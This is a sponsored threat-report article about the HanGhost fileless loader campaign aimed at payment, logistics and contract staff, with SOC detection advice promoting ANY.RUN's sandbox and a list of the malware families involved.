Active HanGhost Loader Campaign Targets Enterprise Payment and Logistics Workflows

Summary

A new HanGhost loader campaign is actively targeting corporate environments, specifically employees in payments, logistics, and contract operations. The attack uses obfuscated JavaScript and PowerShell to execute a .NET loader in memory, delivering multiple malware families including PureHVNC, XWorm, Meduza, AgentTesla, and Phantom without writing artifacts to disk. The campaign deliberately targets finance and operations roles to gain access to financial processes, transaction systems, and operational workflows.

Full text

Security Cyber Attacks MalwareActive HanGhost Loader Campaign Targets Enterprise Payment and Logistics Workflows Active HanGhost Loader campaign targets enterprise payment and logistics workflows with fileless attacks, multi-stage execution, and stealthy malware delivery. byOwais SultanApril 15, 20264 minute read Disclosure: This article was provided by ANY.RUN. The information and analysis presented are based on their research and findings. A new malware campaign built around the HanGhost loader is actively targeting corporate environments, focusing on employees involved in payments, logistics, and contract operations. The attack is designed to operate without leaving clear artifacts, allowing it to reach systems linked to revenue and operations before being fully analyzed. The campaign has already shown multiple waves of activity with different malware families, indicating active development and scaling rather than a one-off attack. How the Attack Unfolds and Why Most SOCs See It Too Late The attack chain combines multiple techniques that individually look benign but together create a highly evasive execution flow. See full attack analysis inside the ANY.RUN sandbox The attack utilizes scripts and PowerShell It starts with obfuscated JavaScript that executes hidden PowerShell commands. These commands execute a .NET loader directly in memory, which then retrieves a seemingly harmless image file containing an encrypted payload. The payload is extracted and executed without ever being written to disk. The malware payload hides inside an image This chain is used to deliver multiple malware families, including PureHVNC, XWorm, Meduza, AgentTesla, and Phantom, with some cases also deploying UltraVNC for persistent remote access. This results in alerts that are either low priority or lack enough context, which slows down triage and delays response. Reduce detection gaps in your SOC with cross-platform threat visibility using ANY.RUN’s sandbox. Request access for your team Attackers Are Targeting Finance and Operations Roles in Businesses The targeting model is deliberate. Instead of aiming at infrastructure or privileged admins, attackers focus on users who interact with financial processes and operational systems on a daily basis. These users regularly execute scripts, open attachments, and communicate externally, which makes malicious activity harder to distinguish from normal behavior. Once compromised, their access can be used to influence transactions, documents, and internal workflows. Persistent remote access: Tools like PureHVNC and XWorm allow continuous monitoring and control Payment systems exposure: Attackers can intercept or modify transaction details during execution Contract manipulation risk: Access to documents and email threads enables unauthorized changes or fraud Logistics disruption: Compromised workflows can delay shipments and break operational processes. The impact is linked directly to how these roles interact with business processes, not just system access. 3 Steps CISOs Need to Take to Detect and Stop HanGhost Early Stopping HanGhost requires changing how triage, response, and threat hunting actually work under pressure. The attack succeeds because teams spend too much time validating signals and not enough time understanding behavior early. Fix Triage to Show Behavior, Not Indicators Analysts cannot rely on hashes, domains, or reputation for this type of attack because most of the chain runs in memory and constantly changes. Triage has to start with execution. ANY.RUN’s Interactive Sandbox exposes HanGhost’s malicious activities in seconds Suspicious files, scripts, and links need to be detonated immediately in an interactive sandbox so the team can see the real process chain, network activity, and hidden stages. ANY.RUN’s Interactive Sandbox provides SOC teams with a fast, integration-ready solution for detecting malware & phishing attacks inside fully interactive virtual environments across Windows, macOS, Linux, and Android. Thanks to the advanced detection capabilities, Tier 1 analysts are able to quickly validate alerts, emails, files, and URLs in minutes and ensure a short MTTR to prevent the attack from evolving into a business security breach. Rebuild Response Around the Full Execution Chain Containment decisions cannot be based on isolated alerts or single indicators. Teams need to see the full execution chain, from the initial script to the final payload, and use that to define scope and response actions. ANY.RUN’s sandbox details the attack TTPs to speed up response Threat intelligence connects infrastructure, behaviors, and related activity, allowing responders to understand how far the attack may have spread and what needs to be blocked beyond the initial entry point. Turn Threat Hunting into a Continuation of Real Incidents Threat hunting should not rely on generic techniques when dealing with active campaigns like this. It needs to start from confirmed behavior observed during triage and response. Once one case is identified, teams should immediately search for the same execution patterns across the environment and use threat intelligence to identify related activity seen in other organizations. ANY.RUN’s TI Lookup provides SOC teams with the latest attack intel from 15,000 organizations, delivering instant, actionable context on over 40 types of IOCs and giving an industry and geo threat landscape view. This expands detection coverage and reduces the chance of missed compromises. ANY.RUN’s TI Lookup gives SOC teams industry and geo attack context When combined, these capabilities shift SOC operations from reactive validation to proactive understanding. That shift is what reduces dwell time, lowers incident cost, and prevents attacks from reaching business-critical systems. Conclusion HanGhost uses a multi-stage, fileless execution chain to deliver remote access malware and credential stealers while avoiding traditional detection. By combining obfuscated scripts, in-memory loaders, and payloads hidden inside image files, it allows attackers to reach systems linked to payments, contracts, and operations without leaving clear artifacts. To stop this type of attack early, SOC teams need to execute suspicious files and scripts in a controlled environment to expose real behavior, and use real-time threat intelligence to understand how the activity connects to ongoing campaigns. This allows teams to detect the attack earlier, scope it correctly, and respond before it spreads further. ANY RUNCybersecurityHanGhost LoaderLogisticsMalware Leave a Reply Cancel reply View Comments (0) Related Posts Read More Security Data Breaches Leaks Millions of US Voter Data Exposed in 13 Misconfigured Databases Cybersecurity researcher finds 4.6M Illinois voter records exposed in unsecured databases. Sensitive data including names, addresses, and SSNs… byWaqas Security Privacy Surveillance Technology Hotspot Shield VPN accused of redirecting user traffic to advertisers A renowned privacy group Center for Democracy & Technology (CDT) has accused Hotspot Shield VPN developed by AnchorFree, Inc. of… byWaqas Security Cyber Attacks Malware Chinese hackers accessed NSA hacking tools before Shadow Brokers leak Chinese hackers then used NSA’s hacking tools and technology to target American allies. Symantec researchers have discovered that… byRyan De Souza Read More Technology Security Maintaining Security and Protecting Smart Home Devices from Hackers Learn how to protect smart home devices from hackers. Strong passwords, updates and secure networks help keep cameras, sensors and data safe. byOwais Sultan

Indicators of Compromise

• malware — HanGhost
• malware — PureHVNC
• malware — XWorm
• malware — Meduza
• malware — AgentTesla
• malware — Phantom
• malware — UltraVNC

Entities